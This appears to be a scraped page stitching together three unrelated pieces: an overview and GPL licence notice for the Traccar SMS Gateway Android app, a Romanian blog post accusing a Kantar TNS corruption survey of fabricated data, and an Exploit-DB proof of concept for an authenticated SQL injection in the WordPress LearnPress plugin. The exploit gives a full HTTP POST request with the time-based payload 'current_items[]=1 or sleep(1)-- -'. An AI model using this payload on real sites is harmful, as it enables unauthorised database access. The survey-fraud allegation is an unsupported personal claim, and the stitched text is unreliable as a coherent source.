  1. Overview Traccar SMS Gateway is an Android messaging app. The key difference from other messaging apps is an option to expose HTTP API for sending SMS messages through the phone. The project is based on another open open source project - QKSMS. Team Anton Tananaev (anton@traccar.org) License GNU General Public License, Version 3 This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Download: Google Play or git clone https://github.com/traccar/traccar-sms-gateway Source
  2. Conform studiului de piata, - statistica opiniei cetateanului prin sondaj, efectuat de Kantar TNS pe 4000 de cetateni romani pentru TRANSPARENCY ORG, Romania are o rata a coruptiei mica comparativ cu alte state mai dezvoltate si cu o economie mai dezvoltata. Cu asa date oficiale te contrazice oricine. Sursa foto Asa zisii intervievati au afirmat ca este foarte bine aici la noi in tara si sunt multumiti, sau sondajul este fals, generat cu softuri specifice de fake marketing. Cei de la K stiu foarte bine cum sa genereze datele ca sa urmeze liniile de progresie 'naturala' dar scripturile utilizate nu au fost programate sa genereze date care sa treaca si de o verificare "manuala" asa ca se regasesc si persoane de 96 de ani interveviate, si o gramada de fermieri la 18 ani sau care au avut o afacere inainte de 18 ani ca si profesie. Interviurile s-au efectuat telefonic utilizand baze de date cu clienti online. Am facut si un review video - tutorial explicativ despre datele fals generate din sondajele si studiile statistice K dar ma mai gandesc daca sa-l public sau nu fiind vorba de agentii mari care au dat $$$$$$$ pentru aceste studii iar impactul este marisor si nu ma mananca-n kur. Tabel varsta, profesie actuala si anterioara a persoanelor din Romania intervievate de K pentru TRANSPARENCY ORG https://extendsclass.com/csv-editor.html#48e7da9 Datele sondajelor transparency se pot descarca de aici: https://www.transparency.org/en/gcb/eu/european-union-2021 GCB-EU-Methodology-and-data-set.zip Fisierul contine datele pentru multiple tari iar eu am extras datele doar pentru Romania. Datele din litere sunt inlocuite -> au corespondent numeric, ex: meseria de fermier are corespondend in coloana 18, tarile au un corespondent numeric la fel si regiunile, dar este document in care explica ce corespondenti sunt. Fisierul zip de mai sus este in format special pentru marketing - statistica .SAV si trebuie convertit: Convertor SAV to EXCEL sau se gasesc pe GitHub unelte pentru statistica. Deci, greseala sau asa trebuia sa iasa sondajele ori aceasta este relitatea?
  3. # Exploit Title: WordPress Plugin LearnPress - 'current_items' SQL Injection (Authenticated) # Date: 07-17-2021 # Exploit Author: nhattruong or nhattruong.blog # Vendor Homepage: https://thimpress.com/learnpress/ # Software Link: https://wordpress.org/plugins/learnpress/ # Version: < # References link: https://wpscan.com/vulnerability/10208 # CVE: CVE-2020-6010 POC: 1. Go to url http://<host>/wp-admin 2. Login with a cred 3. Execute the payload POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/plain, */* Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 128 Origin: http://localhost Connection: close Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145 type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- - # Modify current_items[] as you want Sursa: https://www.exploit-db.com/exploits/50137
